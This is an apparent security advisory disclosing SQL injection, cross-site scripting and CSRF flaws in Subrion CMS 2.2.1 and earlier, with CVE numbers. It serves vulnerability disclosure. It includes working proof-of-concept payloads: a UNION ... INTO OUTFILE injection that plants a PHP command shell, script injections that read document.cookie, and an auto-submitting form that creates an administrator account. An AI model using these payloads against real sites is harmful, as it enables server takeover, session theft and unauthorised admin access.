Lucene search

K
htbridgeHigh-Tech BridgeHTB23113
HistorySep 05, 2012 - 12:00 a.m.

Multiple vulnerabilities in Subrion CMS

2012-09-0500:00:00
High-Tech Bridge
www.htbridge.com
19

0.043 Low

EPSS

Percentile

92.4%

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Subrion CMS, which can be exploited to perform Cross-Site Scripting (XSS), SQL Injection and Сross-Site Request Forgery (CSRF) attacks.

  1. SQL Injection in Subrion CMS: CVE-2012-4772
    Input passed via the “plan_id” POST parameter to /register/ URL (modified by mod_rewrite to /system.php script) is not properly sanitised before being used in SQL query.
    This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
    The following PoC (Proof of Concept) demonstrates the vulnerability:
    <form action=“http://[host]/register/” method=“post”>
    <input type=“hidden” name=“username” value=‘username’ />
    <input type=“hidden” name=“fullname” value=‘fullname’ />
    <input type=“hidden” name=“email” value=‘[email protected]’ />
    <input type=“hidden” name=“password” value=‘password’ />
    <input type=“hidden” name=“password2” value=‘password’ />
    <input type=“hidden” name=“security_code” value=‘[CAPTCHA]’ />
    <input type=“hidden” name=“plan_id” value=“0 UNION SELECT ‘<? system($cmd); ?>’,1,1,1,1,1,1,1,1,1,1,1,1,1 INTO OUTFILE ‘…/…/…/path/to/site/file.php’” />
    <input type=“hidden” name=“register” value=“” />
    <input type=“submit” id=“btn”>
    </form>
    Depending on web and SQL servers configuration, the above-mentioned PoC code creates a simple PHP shell on the vulnerable system.

  2. Cross-Site Scripting (XSS) in Subrion CMS: CVE-2012-4771
    2.1 Input passed via the “f[accounts][fullname]” and “f[accounts][username]” GET parameters to /advsearch/ URL (modified by mod_rewrite to /system.php script) is not properly sanitised before being returned to the user.
    This can be exploited to execute arbitrary HTML and script code in user’s browser session in context of an affected website.
    The following PoC demonstrates the vulnerability:
    <form action=“http://[host]/advsearch/” method=“post”>
    <input type=“hidden” name=“items[]” value=‘accounts’ />
    <input type=“hidden” name=“f[accounts][fullname]” value=‘"><script>alert(document.cookie);</script>’ />
    <input type=“hidden” name=“f[accounts][username]” value=‘"><script>alert(document.cookie);</script>’ />
    <input type=“hidden” name=“q” value=‘’ />
    <input type=“submit” id=“btn”>
    </form>
    2.2 Input passed via the “id” and “group” GET parameters to multiple files is not properly sanitised before being returned to the user.
    This can be exploited to execute arbitrary HTML and script code in administrator’s browser session in context of an affected website.
    The following PoCs demonstrate the vulnerabilities:
    http://[host]/admin/accounts/edit/?id=1%22%3E%3Cscript%3Ealert%28document.co okie%29;%3C/script%3E
    http://[host]/admin/configuration/?group=1%22%3E%3Cscript%3Ealert%28document .cookie%29;%3C/script%3E
    http://[host]/admin/manage/fields/edit/?id=1%22%3E%3Cscript%3Ealert%28docume nt.cookie%29;%3C/script%3E
    http://[host]/admin/manage/blocks/edit/?id=1%22%3E%3Cscript%3Ealert%28docume nt.cookie%29;%3C/script%3E

  3. Сross-Site Request Forgery (CSRF) in Subrion CMS: CVE-2012-4773
    The application allows authorized administrator to perform certain actions via HTTP requests without making proper validity checks to verify the source of the requests. This can be exploited to add, delete or modify sensitive information, for example to create new administrator or execute arbitrary SQL code.
    An attacker should make logged-in administrator open a malicious link in the browser to exploit this vulnerability.
    The following PoC creates administrative account within application:
    <form action=“http://[host]/admin/accounts/add/” method=“post”>
    <input type=“hidden” name=“username” value=‘new_admin’ />
    <input type=“hidden” name=“fullname” value=‘new_admin’ />
    <input type=“hidden” name=“email” value=‘[email protected]’ />
    <input type=“hidden” name=“usergroup” value=‘1’ />
    <input type=“hidden” name=“status” value=‘active’ />
    <input type=“hidden” name=“_password” value=‘_password’ />
    <input type=“hidden” name=“_password2” value=‘_password’ />
    <input type=“hidden” name=“save” value=“Add” />
    <input type=“submit” id=“btn”>
    </form>
    <script>
    document.getElementById(‘btn’).click();
    </scr ipt>

CPENameOperatorVersion
subrion cmsle2.2.1